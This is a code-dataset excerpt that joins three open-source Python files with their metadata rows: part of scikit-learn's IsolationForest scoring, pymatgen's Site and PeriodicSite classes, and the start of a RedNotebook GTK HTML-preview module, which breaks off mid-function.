        Average anomaly score of X of the base classifiers.
        The anomaly score of an input sample is computed as
        the mean anomaly score of the trees in the forest.
        The measure of normality of an observation given a tree is the depth
        of the leaf containing this observation, which is equivalent to
        the number of splittings required to isolate this point. In case of
        several observations n_left in the leaf, the average path length of
        a n_left samples isolation tree is added.
        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features)
            The input samples. Internally, it will be converted to
            ``dtype=np.float32`` and if a sparse matrix is provided
            to a sparse ``csr_matrix``.
        Returns
        -------
        scores : ndarray of shape (n_samples,)
            The anomaly score of the input samples.
            The lower, the more abnormal. Negative scores represent outliers,
            positive scores represent inliers.
        """
        # We subtract self.offset_ to make 0 be the threshold value for being
        # an outlier:
        return self.score_samples(X) - self.offset_
    def score_samples(self, X):
        """
        Opposite of the anomaly score defined in the original paper.
        The anomaly score of an input sample is computed as
        the mean anomaly score of the trees in the forest.
        The measure of normality of an observation given a tree is the depth
        of the leaf containing this observation, which is equivalent to
        the number of splittings required to isolate this point. In case of
        several observations n_left in the leaf, the average path length of
        a n_left samples isolation tree is added.
        Parameters
        ----------
        X : {array-like, sparse matrix} of shape (n_samples, n_features)
            The input samples.
        Returns
        -------
        scores : ndarray of shape (n_samples,)
            The anomaly score of the input samples.
            The lower, the more abnormal.
        """
        # code structure from ForestClassifier/predict_proba
        check_is_fitted(self)
        # Check data
        X = self._validate_data(X, accept_sparse='csr', reset=False)
        # Take the opposite of the scores as bigger is better (here less
        # abnormal)
        return -self._compute_chunked_score_samples(X)
    def _compute_chunked_score_samples(self, X):
        n_samples = _num_samples(X)
        if self._max_features == X.shape[1]:
            subsample_features = False
        else:
            subsample_features = True
        # We get as many rows as possible within our working_memory budget
        # (defined by sklearn.get_config()['working_memory']) to store
        # self._max_features in each row during computation.
        #
        # Note:
        #  - this will get at least 1 row, even if 1 row of score will
        #    exceed working_memory.
        #  - this does only account for temporary memory usage while loading
        #    the data needed to compute the scores -- the returned scores
        #    themselves are 1D.
        chunk_n_rows = get_chunk_n_rows(row_bytes=16 * self._max_features,
                                        max_n_rows=n_samples)
        slices = gen_batches(n_samples, chunk_n_rows)
        scores = np.zeros(n_samples, order="f")
        for sl in slices:
            # compute score on the slices of test samples:
            scores[sl] = self._compute_score_samples(X[sl], subsample_features)
        return scores
    def _compute_score_samples(self, X, subsample_features):
        """
        Compute the score of each samples in X going through the extra trees.
        Parameters
        ----------
        X : array-like or sparse matrix
            Data matrix.
        subsample_features : bool
            Whether features should be subsampled.
        """
        n_samples = X.shape[0]
        depths = np.zeros(n_samples, order="f")
        for tree, features in zip(self.estimators_, self.estimators_features_):
            X_subset = X[:, features] if subsample_features else X
            leaves_index = tree.apply(X_subset)
            node_indicator = tree.decision_path(X_subset)
            n_samples_leaf = tree.tree_.n_node_samples[leaves_index]
            # Path depth = edges on the decision path (#nodes - 1) plus the
            # expected extra depth of a tree grown on the leaf's population.
            depths += (
                np.ravel(node_indicator.sum(axis=1))
                + _average_path_length(n_samples_leaf)
                - 1.0
            )
        # Anomaly score of the reference papers, normalized by the expected
        # average path length of a tree built on max_samples_ points.
        scores = 2 ** (
            -depths
            / (len(self.estimators_)
               * _average_path_length([self.max_samples_]))
        )
        return scores
    def _more_tags(self):
        return {
            '_xfail_checks': {
                'check_sample_weights_invariance':
                'zero sample_weight is not equivalent to removing samples',
            }
        }
def _average_path_length(n_samples_leaf):
    """
    The average path length in a n_samples iTree, which is equal to
    the average path length of an unsuccessful BST search since the
    latter has the same structure as an isolation tree.
    Parameters
    ----------
    n_samples_leaf : array-like of shape (n_samples,)
        The number of training samples in each test sample leaf, for
        each estimators.
    Returns
    -------
    average_path_length : ndarray of shape (n_samples,)
    """
    leaf_counts = check_array(n_samples_leaf, ensure_2d=False)
    original_shape = leaf_counts.shape
    flat = leaf_counts.reshape((1, -1))
    result = np.zeros(flat.shape)
    # Three regimes: n <= 1 has path length 0, n == 2 exactly 1, and the
    # general case follows the closed-form harmonic-number approximation
    # 2 * (H(n - 1)) - 2 * (n - 1) / n with H(i) ~ ln(i) + Euler's constant.
    trivial = flat <= 1
    pair = flat == 2
    general = ~(trivial | pair)
    result[trivial] = 0.0
    result[pair] = 1.0
    n_general = flat[general]
    result[general] = (
        2.0 * (np.log(n_general - 1.0) + np.euler_gamma)
        - 2.0 * (n_general - 1.0) / n_general
    )
    return result.reshape(original_shape)
| anntzer/scikit-learn | sklearn/ensemble/_iforest.py | Python | bsd-3-clause | 18,708 | [
"Gaussian"
] | 3adbda9bc4dbaa50c46b58650401e683714883f94f1a88defe98525b135cdd20 |
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
"""
This module defines classes representing non-periodic and periodic sites.
"""
import collections
import json
from typing import Optional, Tuple, Union
import numpy as np
from monty.dev import deprecated
from monty.json import MontyDecoder, MontyEncoder, MSONable
from pymatgen.core.composition import Composition
from pymatgen.core.lattice import Lattice
from pymatgen.core.periodic_table import DummySpecies, Element, Species, get_el_sp
from pymatgen.util.coord import pbc_diff
from pymatgen.util.typing import ArrayLike, SpeciesLike, CompositionLike
class Site(collections.abc.Hashable, MSONable):
    """
    A generalized *non-periodic* site. This is essentially a composition
    at a point in space, with some optional properties associated with it. A
    Composition is used to represent the atoms and occupancy, which allows for
    disordered site representation. Coords are given in standard cartesian
    coordinates.
    """
    # Absolute tolerance (in Angstrom) used by __eq__ when comparing coords.
    position_atol = 1e-5
    def __init__(
        self,
        species: Union[SpeciesLike, CompositionLike],
        coords: ArrayLike,
        properties: dict = None,
        skip_checks: bool = False,
    ):
        """
        Creates a non-periodic Site.
        :param species: Species on the site. Can be:
            i.  A Composition-type object (preferred)
            ii. An element / species specified either as a string
                symbols, e.g. "Li", "Fe2+", "P" or atomic numbers,
                e.g., 3, 56, or actual Element or Species objects.
            iii.Dict of elements/species and occupancies, e.g.,
                {"Fe" : 0.5, "Mn":0.5}. This allows the setup of
                disordered structures.
        :param coords: Cartesian coordinates of site.
        :param properties: Properties associated with the site as a dict, e.g.
            {"magmom": 5}. Defaults to None.
        :param skip_checks: Whether to ignore all the usual checks and just
            create the site. Use this if the Site is created in a controlled
            manner and speed is desired.
        """
        if not skip_checks:
            if not isinstance(species, Composition):
                # Accept a single element/species symbol first; fall back to
                # treating the input as a composition-like mapping.
                try:
                    species = Composition({get_el_sp(species): 1})
                except TypeError:
                    species = Composition(species)
            totaloccu = species.num_atoms
            if totaloccu > 1 + Composition.amount_tolerance:
                raise ValueError("Species occupancies sum to more than 1!")
            coords = np.array(coords)
        self._species: Composition = species  # type: ignore
        self.coords: np.ndarray = coords  # type: ignore
        self.properties: dict = properties or {}
    def __getattr__(self, a):
        # overriding getattr doens't play nice with pickle, so we
        # can't use self._properties
        p = object.__getattribute__(self, "properties")
        if a in p:
            return p[a]
        raise AttributeError(a)
    @property
    def species(self) -> Composition:
        """
        :return: The species on the site as a composition, e.g., Fe0.5Mn0.5.
        """
        return self._species  # type: ignore
    @species.setter
    def species(self, species: Union[SpeciesLike, CompositionLike]):
        # Same normalization/validation as in __init__.
        if not isinstance(species, Composition):
            try:
                species = Composition({get_el_sp(species): 1})
            except TypeError:
                species = Composition(species)
        totaloccu = species.num_atoms
        if totaloccu > 1 + Composition.amount_tolerance:
            raise ValueError("Species occupancies sum to more than 1!")
        self._species = species
    @property
    def x(self) -> float:
        """
        Cartesian x coordinate
        """
        return self.coords[0]  # type: ignore
    @x.setter
    def x(self, x: float):
        self.coords[0] = x  # type: ignore
    @property
    def y(self) -> float:
        """
        Cartesian y coordinate
        """
        return self.coords[1]  # type: ignore
    @y.setter
    def y(self, y: float):
        self.coords[1] = y  # type: ignore
    @property
    def z(self) -> float:
        """
        Cartesian z coordinate
        """
        return self.coords[2]  # type: ignore
    @z.setter
    def z(self, z: float):
        self.coords[2] = z  # type: ignore
    def distance(self, other) -> float:
        """
        Get distance between two sites.
        Args:
            other: Other site.
        Returns:
            Distance (float)
        """
        return np.linalg.norm(other.coords - self.coords)
    def distance_from_point(self, pt) -> float:
        """
        Returns distance between the site and a point in space.
        Args:
            pt: Cartesian coordinates of point.
        Returns:
            Distance (float)
        """
        return np.linalg.norm(np.array(pt) - self.coords)
    @property
    def species_string(self) -> str:
        """
        String representation of species on the site.
        """
        if self.is_ordered:
            return list(self.species.keys())[0].__str__()
        # Disordered site: list species with occupancies, e.g. "Fe:0.500, Mn:0.500".
        sorted_species = sorted(self.species.keys())
        return ", ".join(["{}:{:.3f}".format(sp, self.species[sp]) for sp in sorted_species])
    @property  # type: ignore
    @deprecated(message="Use site.species instead. This will be deprecated with effect from pymatgen 2020.")
    def species_and_occu(self):
        """
        The species at the site, i.e., a Composition mapping type of
        element/species to occupancy.
        """
        return self.species
    @property
    def specie(self) -> Union[Element, Species, DummySpecies]:
        """
        The Species/Element at the site. Only works for ordered sites. Otherwise
        an AttributeError is raised. Use this property sparingly.  Robust
        design should make use of the property species instead. Note that the
        singular of species is also species. So the choice of this variable
        name is governed by programmatic concerns as opposed to grammar.
        Raises:
            AttributeError if Site is not ordered.
        """
        if not self.is_ordered:
            raise AttributeError("specie property only works for ordered " "sites!")
        return list(self.species.keys())[0]
    @property
    def is_ordered(self) -> bool:
        """
        True if site is an ordered site, i.e., with a single species with
        occupancy 1.
        """
        totaloccu = self.species.num_atoms
        return totaloccu == 1 and len(self.species) == 1
    def __getitem__(self, el):
        """
        Get the occupancy for element
        """
        return self.species[el]
    def __eq__(self, other):
        """
        Site is equal to another site if the species and occupancies are the
        same, and the coordinates are the same to some tolerance.  numpy
        function `allclose` is used to determine if coordinates are close.
        """
        if other is None:
            return False
        return (
            self.species == other.species
            and np.allclose(self.coords, other.coords, atol=Site.position_atol)
            and self.properties == other.properties
        )
    def __ne__(self, other):
        return not self.__eq__(other)
    def __hash__(self):
        """
        Minimally effective hash function that just distinguishes between Sites
        with different elements.
        """
        # NOTE: intentionally coarse -- equal-by-__eq__ sites hash equal, but
        # many unequal sites share a hash (same elements, different coords).
        return sum([el.Z for el in self.species.keys()])
    def __contains__(self, el):
        return el in self.species
    def __repr__(self):
        return "Site: {} ({:.4f}, {:.4f}, {:.4f})".format(self.species_string, *self.coords)
    def __lt__(self, other):
        """
        Sets a default sort order for atomic species by electronegativity. Very
        useful for getting correct formulas. For example, FeO4PLi is
        automatically sorted in LiFePO4.
        """
        if self.species.average_electroneg < other.species.average_electroneg:
            return True
        if self.species.average_electroneg > other.species.average_electroneg:
            return False
        if self.species_string < other.species_string:
            return True
        if self.species_string > other.species_string:
            return False
        return False
    def __str__(self):
        return "{} {}".format(self.coords, self.species_string)
    def as_dict(self) -> dict:
        """
        Json-serializable dict representation for Site.
        """
        species_list = []
        for spec, occu in self.species.items():
            d = spec.as_dict()
            del d["@module"]
            del d["@class"]
            d["occu"] = occu
            species_list.append(d)
        d = {
            "name": self.species_string,
            "species": species_list,
            "xyz": [float(c) for c in self.coords],  # type: ignore
            "properties": self.properties,
            "@module": self.__class__.__module__,
            "@class": self.__class__.__name__,
        }
        # NOTE(review): "properties" is already set in the dict literal above;
        # this conditional reassignment is redundant (same value).
        if self.properties:
            d["properties"] = self.properties
        return d
    @classmethod
    def from_dict(cls, d: dict) -> "Site":
        """
        Create Site from dict representation
        """
        atoms_n_occu = {}
        for sp_occu in d["species"]:
            # Decide whether the entry describes a real Species (element with
            # oxidation state), a DummySpecies, or a plain Element.
            if "oxidation_state" in sp_occu and Element.is_valid_symbol(sp_occu["element"]):
                sp = Species.from_dict(sp_occu)
            elif "oxidation_state" in sp_occu:
                sp = DummySpecies.from_dict(sp_occu)
            else:
                sp = Element(sp_occu["element"])  # type: ignore
            atoms_n_occu[sp] = sp_occu["occu"]
        props = d.get("properties", None)
        if props is not None:
            # Round-trip properties through MontyEncoder/Decoder to restore
            # any MSONable objects stored as dicts.
            for key in props.keys():
                props[key] = json.loads(json.dumps(props[key], cls=MontyEncoder), cls=MontyDecoder)
        return cls(atoms_n_occu, d["xyz"], properties=props)
class PeriodicSite(Site, MSONable):
"""
Extension of generic Site object to periodic systems.
PeriodicSite includes a lattice system.
"""
def __init__(
self,
species: Union[SpeciesLike, CompositionLike],
coords: ArrayLike,
lattice: Lattice,
to_unit_cell: bool = False,
coords_are_cartesian: bool = False,
properties: dict = None,
skip_checks: bool = False,
):
"""
Create a periodic site.
:param species: Species on the site. Can be:
i. A Composition-type object (preferred)
ii. An element / species specified either as a string
symbols, e.g. "Li", "Fe2+", "P" or atomic numbers,
e.g., 3, 56, or actual Element or Species objects.
iii.Dict of elements/species and occupancies, e.g.,
{"Fe" : 0.5, "Mn":0.5}. This allows the setup of
disordered structures.
:param coords: Cartesian coordinates of site.
:param lattice: Lattice associated with the site.
:param to_unit_cell: Translates fractional coordinate to the
basic unit cell, i.e. all fractional coordinates satisfy 0
<= a < 1. Defaults to False.
:param coords_are_cartesian: Set to True if you are providing
cartesian coordinates. Defaults to False.
:param properties: Properties associated with the site as a dict, e.g.
{"magmom": 5}. Defaults to None.
:param skip_checks: Whether to ignore all the usual checks and just
create the site. Use this if the PeriodicSite is created in a
controlled manner and speed is desired.
"""
if coords_are_cartesian:
frac_coords = lattice.get_fractional_coords(coords)
else:
frac_coords = coords # type: ignore
if to_unit_cell:
frac_coords = np.mod(frac_coords, 1)
if not skip_checks:
frac_coords = np.array(frac_coords)
if not isinstance(species, Composition):
try:
species = Composition({get_el_sp(species): 1})
except TypeError:
species = Composition(species)
totaloccu = species.num_atoms
if totaloccu > 1 + Composition.amount_tolerance:
raise ValueError("Species occupancies sum to more than 1!")
self._lattice: Lattice = lattice
self._frac_coords: ArrayLike = frac_coords
self._species: Composition = species # type: ignore
self._coords: Optional[np.ndarray] = None
self.properties: dict = properties or {}
def __hash__(self):
"""
Minimally effective hash function that just distinguishes between Sites
with different elements.
"""
return sum([el.Z for el in self.species.keys()])
@property
def lattice(self) -> Lattice:
"""
Lattice associated with PeriodicSite
"""
return self._lattice
@lattice.setter
def lattice(self, lattice: Lattice):
"""
Sets Lattice associated with PeriodicSite
"""
self._lattice = lattice
self._coords = self._lattice.get_cartesian_coords(self._frac_coords)
@property # type: ignore
def coords(self) -> np.ndarray: # type: ignore
"""
Cartesian coordinates
"""
if self._coords is None:
self._coords = self._lattice.get_cartesian_coords(self._frac_coords)
return self._coords
@coords.setter
def coords(self, coords):
"""
Set Cartesian coordinates
"""
self._coords = np.array(coords)
self._frac_coords = self._lattice.get_fractional_coords(self._coords)
@property
def frac_coords(self) -> np.ndarray:
"""
Fractional coordinates
"""
return self._frac_coords # type: ignore
@frac_coords.setter
def frac_coords(self, frac_coords):
"""
Set fractional coordinates
"""
self._frac_coords = np.array(frac_coords)
self._coords = self._lattice.get_cartesian_coords(self._frac_coords)
    @property
    def a(self) -> float:
        """
        Fractional a coordinate
        """
        return self._frac_coords[0]  # type: ignore
    @a.setter
    def a(self, a: float):
        # Mutates the fractional coords in place, then refreshes the
        # cached cartesian coords.
        self._frac_coords[0] = a  # type: ignore
        self._coords = self._lattice.get_cartesian_coords(self._frac_coords)
    @property
    def b(self) -> float:
        """
        Fractional b coordinate
        """
        return self._frac_coords[1]  # type: ignore
    @b.setter
    def b(self, b: float):
        # See the `a` setter: in-place mutation + cache refresh.
        self._frac_coords[1] = b  # type: ignore
        self._coords = self._lattice.get_cartesian_coords(self._frac_coords)
    @property
    def c(self) -> float:
        """
        Fractional c coordinate
        """
        return self._frac_coords[2]  # type: ignore
    @c.setter
    def c(self, c: float):
        # See the `a` setter: in-place mutation + cache refresh.
        self._frac_coords[2] = c  # type: ignore
        self._coords = self._lattice.get_cartesian_coords(self._frac_coords)
    @property
    def x(self) -> float:
        """
        Cartesian x coordinate
        """
        # Goes through the `coords` property so the cache is built if needed.
        return self.coords[0]
    @x.setter
    def x(self, x: float):
        # Mutates the cached cartesian array, then resyncs the fractional coords.
        self.coords[0] = x
        self._frac_coords = self._lattice.get_fractional_coords(self.coords)
    @property
    def y(self) -> float:
        """
        Cartesian y coordinate
        """
        return self.coords[1]
    @y.setter
    def y(self, y: float):
        # See the `x` setter: in-place mutation + fractional resync.
        self.coords[1] = y
        self._frac_coords = self._lattice.get_fractional_coords(self.coords)
    @property
    def z(self) -> float:
        """
        Cartesian z coordinate
        """
        return self.coords[2]
    @z.setter
    def z(self, z: float):
        # See the `x` setter: in-place mutation + fractional resync.
        self.coords[2] = z
        self._frac_coords = self._lattice.get_fractional_coords(self.coords)
    def to_unit_cell(self, in_place=False) -> Optional["PeriodicSite"]:
        """
        Move frac coords to within the unit cell.

        Args:
            in_place (bool): If True, mutate this site and return None.
                Otherwise return a new translated PeriodicSite.
        """
        # np.mod maps each fractional coordinate into [0, 1).
        frac_coords = np.mod(self.frac_coords, 1)
        if in_place:
            self.frac_coords = frac_coords
            return None
        return PeriodicSite(self.species, frac_coords, self.lattice, properties=self.properties)
    def is_periodic_image(self, other: "PeriodicSite", tolerance: float = 1e-8, check_lattice: bool = True) -> bool:
        """
        Returns True if sites are periodic images of each other.
        Args:
            other (PeriodicSite): Other site
            tolerance (float): Tolerance to compare fractional coordinates
            check_lattice (bool): Whether to check if the two sites have the
                same lattice.
        Returns:
            bool: True if sites are periodic images of each other.
        """
        if check_lattice and self.lattice != other.lattice:
            return False
        if self.species != other.species:
            return False
        # pbc_diff wraps the fractional-coordinate difference into [-0.5, 0.5),
        # so periodic images differ by ~0 in every component.
        frac_diff = pbc_diff(self.frac_coords, other.frac_coords)
        return np.allclose(frac_diff, [0, 0, 0], atol=tolerance)
    def __eq__(self, other):
        # Equality requires matching species, lattice, cartesian position
        # (within Site.position_atol) and properties.
        # NOTE(review): assumes ``other`` is also a site-like object; comparing
        # against an unrelated type raises AttributeError instead of returning
        # NotImplemented — confirm callers never rely on that.
        return (
            self.species == other.species
            and self.lattice == other.lattice
            and np.allclose(self.coords, other.coords, atol=Site.position_atol)
            and self.properties == other.properties
        )
    def __ne__(self, other):
        # Explicit inverse kept (Python 2 heritage); Python 3 would derive it.
        return not self.__eq__(other)
    def distance_and_image_from_frac_coords(
        self, fcoords: ArrayLike, jimage: Optional[ArrayLike] = None
    ) -> Tuple[float, np.ndarray]:
        """
        Gets distance between site and a fractional coordinate assuming
        periodic boundary conditions. If the index jimage of two sites atom j
        is not specified it selects the j image nearest to the i atom and
        returns the distance and jimage indices in terms of lattice vector
        translations. If the index jimage of atom j is specified it returns the
        distance between the i atom and the specified jimage atom, the given
        jimage is also returned.
        Args:
            fcoords (3x1 array): fcoords to get distance from.
            jimage (3x1 array): Specific periodic image in terms of
                lattice translations, e.g., [1,0,0] implies to take periodic
                image that is one a-lattice vector away. If jimage is None,
                the image that is nearest to the site is found.
        Returns:
            (distance, jimage): distance and periodic lattice translations
                of the other site for which the distance applies.
        """
        # All the periodic-image arithmetic is delegated to the Lattice.
        return self.lattice.get_distance_and_image(self.frac_coords, fcoords, jimage=jimage)
    def distance_and_image(self, other: "PeriodicSite", jimage: Optional[ArrayLike] = None) -> Tuple[float, np.ndarray]:
        """
        Gets distance and instance between two sites assuming periodic boundary
        conditions. If the index jimage of two sites atom j is not specified it
        selects the j image nearest to the i atom and returns the distance and
        jimage indices in terms of lattice vector translations. If the index
        jimage of atom j is specified it returns the distance between the ith
        atom and the specified jimage atom, the given jimage is also returned.
        Args:
            other (PeriodicSite): Other site to get distance from.
            jimage (3x1 array): Specific periodic image in terms of lattice
                translations, e.g., [1,0,0] implies to take periodic image
                that is one a-lattice vector away. If jimage is None,
                the image that is nearest to the site is found.
        Returns:
            (distance, jimage): distance and periodic lattice translations
                of the other site for which the distance applies.
        """
        # Convenience wrapper around the fractional-coordinate variant.
        return self.distance_and_image_from_frac_coords(other.frac_coords, jimage)
    def distance(self, other: "PeriodicSite", jimage: Optional[ArrayLike] = None):
        """
        Get distance between two sites assuming periodic boundary conditions.
        Args:
            other (PeriodicSite): Other site to get distance from.
            jimage (3x1 array): Specific periodic image in terms of lattice
                translations, e.g., [1,0,0] implies to take periodic image
                that is one a-lattice vector away. If jimage is None,
                the image that is nearest to the site is found.
        Returns:
            distance (float): Distance between the two sites
        """
        # Drops the jimage part of distance_and_image's return value.
        return self.distance_and_image(other, jimage)[0]
def __repr__(self):
return "PeriodicSite: {} ({:.4f}, {:.4f}, {:.4f}) [{:.4f}, {:.4f}, " "{:.4f}]".format(
self.species_string, self.coords[0], self.coords[1], self.coords[2], *self._frac_coords
)
    def as_dict(self, verbosity: int = 0) -> dict:
        """
        Json-serializable dict representation of PeriodicSite.
        Args:
            verbosity (int): Verbosity level. Default of 0 only includes the
                matrix representation. Set to 1 for more details such as
                cartesian coordinates, etc.
        """
        species_list = []
        for spec, occu in self._species.items():
            d = spec.as_dict()
            # @module/@class of the species are redundant inside a site dict.
            del d["@module"]
            del d["@class"]
            d["occu"] = occu
            species_list.append(d)
        d = {
            "species": species_list,
            "abc": [float(c) for c in self._frac_coords],  # type: ignore
            "lattice": self._lattice.as_dict(verbosity=verbosity),
            "@module": self.__class__.__module__,
            "@class": self.__class__.__name__,
        }
        if verbosity > 0:
            # Optional extras: cartesian coords and a human-readable label.
            d["xyz"] = [float(c) for c in self.coords]
            d["label"] = self.species_string
        d["properties"] = self.properties
        return d
    @classmethod
    def from_dict(cls, d, lattice=None) -> "PeriodicSite":
        """
        Create PeriodicSite from dict representation.
        Args:
            d (dict): dict representation of PeriodicSite
            lattice: Optional lattice to override lattice specified in d.
                Useful for ensuring all sites in a structure share the same
                lattice.
        Returns:
            PeriodicSite
        """
        species = {}
        for sp_occu in d["species"]:
            # Dispatch on the dict shape: an oxidation state plus a valid
            # element symbol means Species; oxidation state alone means
            # DummySpecies; otherwise a plain Element.
            if "oxidation_state" in sp_occu and Element.is_valid_symbol(sp_occu["element"]):
                sp = Species.from_dict(sp_occu)
            elif "oxidation_state" in sp_occu:
                sp = DummySpecies.from_dict(sp_occu)
            else:
                sp = Element(sp_occu["element"])  # type: ignore
            species[sp] = sp_occu["occu"]
        props = d.get("properties", None)
        if props is not None:
            # Round-trip each property through Monty JSON so any serialized
            # MSONable objects are reconstituted.
            for key in props.keys():
                props[key] = json.loads(json.dumps(props[key], cls=MontyEncoder), cls=MontyDecoder)
        lattice = lattice if lattice else Lattice.from_dict(d["lattice"])
        return cls(species, d["abc"], lattice, properties=props)
| richardtran415/pymatgen | pymatgen/core/sites.py | Python | mit | 23,358 | [
"pymatgen"
] | 37c0fdfe4dd344810a50420131e6ec1f74df2a5f0d0dc6d1b7201693f8aec794 |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------
# Copyright (c) 2009 Jendrik Seipp
#
# RedNotebook is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# RedNotebook is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with RedNotebook; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
# -----------------------------------------------------------------------
import sys
import os
import StringIO
import logging
import gtk
import pango
'''
Notes:
This module makes use of the keepnote gui module and especially its richtext
submodule.
It provides the HtmlEditor class which is used for previewing a day's text.
Later the richtext editing feature will be added.
Some code in this module has been taken from keepnote modules and was altered
to fit RedNotebook's needs. The original keepnote modules have not been altered
in any significant way. Only some imports where changed or commented out.
'''
from rednotebook.gui.keepnote.gui.editor import KeepNoteEditor
from rednotebook.gui.keepnote.gui.richtext import RichTextView, RichTextModTag, RichTextIO, \
HtmlError, RichTextError, RichTextImage, is_relative_file
from rednotebook.gui.keepnote.gui.richtext.richtext_html import HtmlBuffer, HtmlTagReader, \
HtmlTagWriter, unnest_indent_tags
from rednotebook.gui.keepnote.gui.richtext.textbuffer_tools import TagNameDom, TextBufferDom, \
iter_buffer_contents
from rednotebook.gui.keepnote.gui.richtext.richtext_tags import RichTextTag
from rednotebook.gui.keepnote.gui.richtext.richtextbuffer import ignore_tag
from rednotebook.util import filesystem
# Tag names that iter_buffer_contents must skip (transient spell-checker
# highlighting is presentation-only and not part of the document).
IGNORE_TAGS = set(["gtkspell-misspelled"])
def ignore_tag(tag):
    """Return True if this text tag should be excluded from buffer iteration."""
    name = tag.get_property("name")
    return name in IGNORE_TAGS
class RichTextH3Tag(RichTextTag):
    # Rich text tag representing an HTML <h3> heading.
    def __init__(self, kind):
        RichTextTag.__init__(self, "h3")
        self.kind = kind
class HtmlTagH3Reader(HtmlTagReader):
    # Translates <h3>...</h3> into an "h3" DOM tag surrounded by newlines.
    def __init__(self, io):
        HtmlTagReader.__init__(self, io, "h3")
    def parse_starttag(self, htmltag, attrs):
        # self._io is a RedNotebookHtmlBuffer instance
        self._io.append_text("\n")
        self._io.append_child(TagNameDom('h3'), True)
    def parse_endtag(self, htmltag):
        self._io.append_text("\n")
class HtmlTagParReader(HtmlTagReader):
    # paragraph
    # NOTE: this tag is currently not used by KeepNote, but if pasting
    # text from another HTML source, KeepNote will interpret it as
    # a newline char
    def __init__(self, io):
        HtmlTagReader.__init__(self, io, "p")
        # Counter of paragraphs seen so far; reset by the buffer on each read.
        self.paragraphs = 0
    def parse_starttag(self, htmltag, attrs):
        # Don't insert a newline at the beginning of a document
        if self.paragraphs > 0:
            self._io.append_text("\n")
        self.paragraphs += 1
    def parse_endtag(self, htmltag):
        self._io.append_text("\n")
class RedNotebookHtmlBuffer(HtmlBuffer):
    # HtmlBuffer subclass that adds <h3> support and replaces keepnote's
    # paragraph reader so the first paragraph does not start with a newline.
    # NOTE: this file is Python 2 ("except Exception, e" syntax below).
    def __init__(self):
        HtmlBuffer.__init__(self)
        self.add_tag_reader(HtmlTagH3Reader(self))
        # overwrite keepnote par reader
        self.par_reader = HtmlTagParReader(self)
        self.add_tag_reader(self.par_reader)
    def read(self, html, partial=False, ignore_errors=False):
        """Read from stream infile to populate textbuffer"""
        # Enable check if we're at the top of a document
        self.par_reader.paragraphs = 0
        #self._text_queue = []
        self._within_body = False
        self._partial = partial
        self._dom = TextBufferDom()
        self._dom_ptr = self._dom
        self._tag_stack = [(None, self._dom)]
        try:
            self.feed(html)
            self.close()
        except Exception, e:
            # reraise error if not ignored
            if not ignore_errors:
                raise
        # Post-process the DOM and yield its contents with indent tags
        # un-nested (the flat form the text buffer expects).
        self.process_dom_read(self._dom)
        return unnest_indent_tags(self._dom.get_contents())
class HtmlView(RichTextView):
    # RichTextView configured for RedNotebook's HTML preview: registers the
    # h3 tag class, wires URL clicks and disables spell checking.
    def __init__(self):
        RichTextView.__init__(self)
        tag_table = self._textbuffer.get_tag_table()
        tag_table.new_tag_class("h3", RichTextH3Tag)
        # 14pt corresponds to h3
        # NOTE(review): the comment above says 14pt but the code uses
        # size_points=16 — confirm which value is intended.
        tag_table.tag_class_add("h3", RichTextModTag("h3", weight=pango.WEIGHT_BOLD, size_points=16))
        self.connect("visit-url", self._on_visit_url)
        self._html_buffer = RedNotebookHtmlBuffer()
        self.enable_spell_check(False)
        #print 'self.is_spell_check_enabled()', self.is_spell_check_enabled()
        #self.set_editable(False)
    def get_buffer(self):
        # Expose the underlying gtk text buffer.
        return self._textbuffer
    def _on_visit_url(self, textview, url):
        # Open clicked links with the platform handler.
        logging.info('clicked %s' % url)
        filesystem.open_url(url)
    def highlight(self, text):
        # Select the first case-variant of `text` found in the buffer.
        iter_start = self.get_buffer().get_start_iter()
        # Hack: Ignoring the case is not supported for the search so we search
        # for the most common variants, but do not search identical ones
        variants = set([text, text.capitalize(), text.lower(), text.upper()])
        for search_text in variants:
            iter_tuple = iter_start.forward_search(search_text, gtk.TEXT_SEARCH_VISIBLE_ONLY)
            # When we find one variant, highlight it and quit
            if iter_tuple:
                self.set_selection(*iter_tuple)
                return
    def set_selection(self, iter1, iter2):
        '''
        Sort the two iters and select the text between them
        '''
        sort_by_position = lambda iter: iter.get_offset()
        iter1, iter2 = sorted([iter1, iter2], key=sort_by_position)
        assert iter1.get_offset() <= iter2.get_offset()
        self.get_buffer().select_range(iter1, iter2)
class HtmlIO(RichTextIO):
    # RichTextIO variant that loads/saves HTML strings (instead of files)
    # using RedNotebookHtmlBuffer. NOTE: Python 2 except-syntax below.
    def __init__(self):
        RichTextIO.__init__(self)
        self._html_buffer = RedNotebookHtmlBuffer()
    def load(self, textview, textbuffer, html):
        """Load buffer with data from file"""
        # unhook expensive callbacks
        textbuffer.block_signals()
        spell = textview.is_spell_check_enabled()
        textview.enable_spell_check(False)
        textview.set_buffer(None)
        # clear buffer
        textbuffer.clear()
        err = None
        try:
            #from rasmus import util
            #util.tic("read")
            buffer_contents = list(self._html_buffer.read(html))
            #util.toc()
            #util.tic("read2")
            textbuffer.insert_contents(buffer_contents,
                                       textbuffer.get_start_iter())
            #util.toc()
            # put cursor at begining
            textbuffer.place_cursor(textbuffer.get_start_iter())
        except IOError:
            # NOTE(review): this branch leaves `ret` unbound, so the
            # "if not ret" check below would raise NameError — confirm
            # IOError can actually occur here.
            pass
        except (HtmlError, IOError, Exception), e:
            logging.error(e)
            err = e
            # TODO: turn into function
            textbuffer.clear()
            textview.set_buffer(textbuffer)
            ret = False
        else:
            # finish loading
            path = os.path.dirname(os.path.abspath(__file__))
            self._load_images(textbuffer, path)
            textview.set_buffer(textbuffer)
            textview.show_all()
            ret = True
        # rehook up callbacks
        textbuffer.unblock_signals()
        textview.enable_spell_check(spell)
        textview.enable()
        textbuffer.set_modified(False)
        # reraise error
        # NOTE(review): `e` is only bound in the except branch; on the success
        # path "not ret" is False so this line is never reached with e unbound.
        if not ret:
            raise RichTextError("Error loading '%s'." % 'html', e)
    def save(self, textbuffer):
        """Save buffer contents to file"""
        try:
